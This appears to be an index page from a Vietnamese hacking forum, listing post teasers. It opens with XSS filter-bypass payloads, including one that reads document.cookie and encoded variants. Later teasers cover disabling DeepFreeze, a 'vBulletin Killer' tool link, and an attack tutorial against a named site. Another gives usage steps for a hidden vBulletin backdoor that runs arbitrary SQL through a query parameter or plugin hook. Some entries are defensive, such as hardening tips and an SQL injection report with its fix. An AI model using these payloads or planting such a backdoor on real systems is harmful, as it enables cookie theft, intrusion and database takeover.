XSS Master Guide FOR ALL XPERTS and NOOBS

This is a detailed guide to everything XSS.

What is XSS?
XSS stands for Cross Site Scripting. Sometimes it is called CSS however that is often confused with Cascading Style Sheets so XSS is the preferred term.
Cross Site Scripting is a means to take advantage of web applications that take user input but aren't filtered properly. This allows an attacker to inject HTML or other codes such as Javascript into the server to manipulate it in some way.

Xem Thêm

Bypass XSS filters

Đa số các "bộ lọc" sẽ sử dụng cách cơ bản nhất là chặn các thẻ <script></script>.

Chúng ta sẽ cùng xem một số VD sau:

+Sử dụng các thuộc tính của các thẻ html:

<body onload=alert('test1')>

<b onmouseover=alert('Wufff!')>click me!</b>

<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

+Sử dụng thuộc tính SRC:

<IMG SRC=javascript:alert('XSS')>

<BGSOUND SRC="javascript:alert('XSS');">

Encode nội dung (UTF-8)

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

+Sử dụng URI đã được encode base64

<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại: http://ha.ckers.org/xss.html

Xem Thêm

Mở băng DeepFreeze bằng tay

Với 1 máy đã được cài DeepFreeze. Nếu ở chế độ mở băng ta có thể thay đổi bình thường, gỡ bỏ chương trình... Với chế độ đóng băng ta không thể làm gì được. Chương trình DeepFreeze khởi động 1 Driver tên DeepFrz để đóng băng, muốn vô hiệu hóa đóng băng ta sẽ phải tiến hành vô hiệu hóa Driver đó từ HĐH khác.

Xem Thêm

TUT UG (video) tổng hợp dành cho newbie

Tổng hợp bộ sưu tập TUT UG (video) dành cho newbie, anh em newbie có thời gian thì tải về nghiên cứu thử nhé
link:
http://www.mediafire.com/?pm55krbicizbc

Xem Thêm

[TUT] - Bảo mật cho Forum vBulletin

Phần I
Bài viết này Mafia viết thêm dựa trên tài liệu của shacker và một bài viết bằng tiếng Anh viết về bảo mật cho vbb. ok vào đề đi nào!

Xem Thêm

10 lưu ý bảo mật dữ liệu cho website

Bài này đc a Justom viết bên enhack
hum nay mình leech về để mọi người tham khảo thêm
10 lưu ý bảo mật dữ liệu cho website PHP sử dụng Shared hosting Linux Ngày nay các ứng dụng web với mã nguồn mở phát triển rất mạnh, trong đó đặc biệt phổ biến là PHP – MySQL. Nhưng công nghệ phát triển đồng thời kéo theo những “tin tặc” trẻ luôn muốn khẳng định mình sau khi xem những hướng dẫn tấn công, khai thác lỗi đầy rẫy trên các forum hacker. Vì thế bất kì một website nào cũng có khả năng bị tấn công bất cứ lúc nào, đặc biệt là các site cá nhân, tập thể vừa và nhỏ sẽ chọn giải pháp là thuê shared hosting trên một server. Vì các shared hosting ở cùng server nên độ riêng tư không cao, việc kiên cố hoá website trên shared hosting là rất cần thiết.

Xem Thêm

vBulletin Killer

 

[*] Php Version

http://pastebin.com/AX1bJbdH

[*] Python

http://pastebin.com/dKDH0SBc 

Xem Thêm

[TUT] Bug validator.php trong vBulletin

TUT hướng dẫn bug tấn công vào icare.com.vn qua file Validator.php
Tác Giả: Nobody

Link down:

http://www.mediafire.com/?ntrngjdzczj

Đây cùng do sự bất cẩn của admin quên chưa xóa fle Validator.php file này có khả năng view hệ các file và thư mục của vBB.

Xem Thêm

Hidden Baby cho vBulletin (all version)

Screenshot:

Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....)

Cách sử dụng

Quote:

+ Up thẳng vào thư mục forum vBB (ngang hàng với index.php). + Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql hoặc + Admincp -> Product & Plugin Manager -> Add new plugin -> - Hook Location : tùy thích (mình hay dùng faq_complete) - Plugin PHP Code : Copy nguyên code ở dưới vào, bỏ "<?php" ở đầu và "?>" ở cuối đi - Plugin is active : Yes + Run : http://site.com/forum/faq.php?vnh= Câu lệnh sql

Download:

http://www.mediafire.com/?y9yz0gm6r4e4uxr

 Nguồn: VNHack.

Xem Thêm

[vBulletin] Admin Reset Tools - Công cụ dành cho Admin

Trong trường hợp bạn bị mất quyền Admin, mất hết Permission (hoặc bị thay đổi permission).

Công cụ này sẽ giúp bạn lấy lại group Admin và toàn quyền quản lí diễn đàn (Full Administrator Permission).

Demo:

Download:

File name: Admin-Reset-Tools.php

http://www.mediafire.com/?0279fvoisek8t27 (3 KB)

Password Unlock: junookyo

* Sử dụng:

Thay đổi thông tin DataBase như config.php của bạn:

// MySQL Info
    $host = 'localhost';
    $user = 'root';
    $password = '*****';
    $dbname = '*****'; 

Sau đó upload lên ngang hàng index forum và sử dụng.

P/S: Thực ra thì admin hoàn toàn có thể tự thay bằng cách vào phpMyAdmin, đây chỉ là công cụ giúp bạn khôi phục group Admin và toàn quyền quản lí Forum của mình nhanh nhất! :)

Nguồn: Junookyo !

Xem Thêm

[Report] ChangUonDyU Advanced Statistics - SQL injection

Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được

Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static.
Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là
$_REQUEST['listforumid']

Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search VBB vì rất nhiều người đang sử dụng mod này).

Từ Bug này, chúng ta có thể lấy được dữ liệu từ database => Login vào admin => Login vào admincp => Up shell => blah blah

Ở đây DuyK sẽ không nói đến cách khai thác để đề phòng "Hacker chẻ châu" quậy phá mọi người (Hacker thực sự sẽ hiểu vấn đề ngay nên khỏi cần phải nói)

Vì rất nhiều người đang sử dụng mod này và chưa fix nên DuyK hi vọng mọi người sẽ lan truyền report này.

Để fix mod này. Các bạn vào: Admincp -> Plugin & product option -> Plugin manage -> ChangUonDyU - Advanced Statistics - Get Data -> EDIT

Bạn tìm đến dòng:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);

Thay bằng:
$foruminid = intval($_REQUEST['listforumid']);

Report từ: DaiCa.Net - Forum newbie học hỏi

P/S by Juno_okyo:

Rất nhiều Diễn đàn đang sử dụng mod Statstics này nên mọi người nhanh chóng fix nhé.
Bug này được phát hiện từ mod tương tự của bác Chang cho MyBB, kiểm tra thì thấy mod bên vBB cũng dính.

Xem Thêm